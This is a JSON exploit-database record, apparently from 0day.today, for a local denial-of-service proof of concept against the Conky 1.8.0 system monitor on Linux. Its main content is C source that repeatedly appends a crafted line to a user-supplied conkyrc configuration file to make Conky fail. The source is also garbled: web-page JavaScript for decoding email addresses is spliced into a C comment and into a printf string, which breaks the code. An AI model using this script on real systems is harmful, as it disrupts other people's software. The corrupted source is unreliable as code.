Conky Linux 1.8.0 Local DoS/PoC Exploit

{"type": "zdt", "lastseen": "2016-04-20T01:54:40", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Conky Linux 1.8.0 Local DoS/PoC Exploit", "published": "2011-06-14T00:00:00", "href": "http://0day.today/exploit/description/16334", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux platform in category dos / poc", "hash": "f3870d76292e626c9890b754886ae3fa6cb46cfb41faaea660540f1f448c2183", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "/* */\r\n/* Vulnerability Conky 1.8.0 on Linux */\r\n/* Tested on: Linux with kernel 2.6.32.1-smp */\r\n/* Found: by Arturo D'Elia */\r\n/* Date found: 12 Dec 2010 */\r\n/* Fix: No Fix */\r\n/* Contacts: arturo.delia@libero.it<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script> */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\nchar killyou[]= \"# w000wwwww i exploit it and i kill you!\";\r\n \r\nint main( int argc, char **argv){\r\n \r\n FILE *fp;\r\n \r\n /* Write the information program*/\r\n printf(\"\\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\\n\");\r\n printf(\"[*] Coded by: Arturo D'Elia\\n\");\r\n printf(\"[*] Tested on: Linux\\n\");\r\n printf(\"[*] Kernel version: 2.6.32.1-smp\\n\");\r\n printf(\"[*] Bug Found: 12 Dec 2010\\n\");\r\n printf(\"[*] Contacts: arturo.delia@libero.it<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\\n\\n\");\r\n \r\n /* Check the input parameter */\r\n if(argc!=2)\r\n exit(fprintf(stderr,\"Usage: %s < path conkyrc >\\n\",argv[0]));\r\n \r\n /* Check file exsist */\r\n printf(\"[>] Open conky configuration\\n\");\r\n if((fp=fopen(argv[1],\"r\"))==NULL)\r\n exit(fprintf(stderr,\"[x] Cannot open %s file\\n\",argv[1]));\r\n fclose(fp);\r\n \r\n /* Open file for append and i send it the */\r\n /* exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n printf(\"[>] Send the DoS/PoC string\\n\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Wait 3 seconds */\r\n usleep(3000000);\r\n \r\n /* Resend exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Ok guy. */\r\n printf(\"[*] Ok guy, you kill it.\\n\\n\");\r\nreturn 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-16334", "sourceHref": "http://0day.today/exploit/16334", "modified": "2011-06-14T00:00:00", "reporter": "Arturo D'Elia", "enchantments": {"vulnersScore": 1.9}}